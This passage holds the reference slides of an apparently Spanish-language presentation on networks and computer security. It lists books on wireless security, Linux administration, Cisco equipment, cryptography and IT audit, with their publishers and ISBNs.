    Seguridad, pp. 235-289, ISBN 84-7829-049-4.
  • Nyhus, R. (2008). Redes y Redes Inalámbricas. PC
    Cuadernos, España.
  • Facundo, H. (2007). Revista USERS LinuxSeguridad,
    número 24 pp. 24-37.

119
Referencias
  • Froufe, A. y Jorge, P. (2004) J2ME Java 2 Micro
    Edition, Alfaomega Ra-Ma, México, ISBN
    970-15-1022-4.
  • Millán, R. (2006). Domine las Redes P2P,
    Alfaomega, España, ISBN 970-15-1206-5.
  • Velte, T. (2008). Manual de Cisco, Cuarta
    Edición, McGraw-Hill, México, ISBN
    978-970-10-5927-2

120
Referencias
  • Stallings, W. (2004) Comunicaciones y Redes de
    Computadoras, Séptima Edición, Pearson Prentice
    Hall, España, ISBN 84-205-4110-9.
  • Nichols, R. y Lekkas, P. (2003) Seguridad para
    Comunicaciones Inalámbricas, McGraw-Hill, España,
    ISBN 84-481-3782-5.
  • Shah, S. (2001) Manual de Administración de
    Linux, Osborne McGraw-Hill, España, ISBN
    84-481-2892-3

121
Referencias
  • Gómez, A. (2007). Enciclopedia de la Seguridad
    Informática, Alfaomega, México, ISBN
    978-970-15-1266-1.
  • McNab, C. (2004). Seguridad de Redes. Anaya
    Multimedia OReilly, España, ISBN 84-415-1751-1
  • Caballero, P. (2001), Introducción a la
    criptografía Alfaomega Rama

122
References
  • Senft, S. And Gallegos, F. (2008) Information
    Technology Control and Audit, Third Edition, CRC
    Press, United States
About PowerShow.com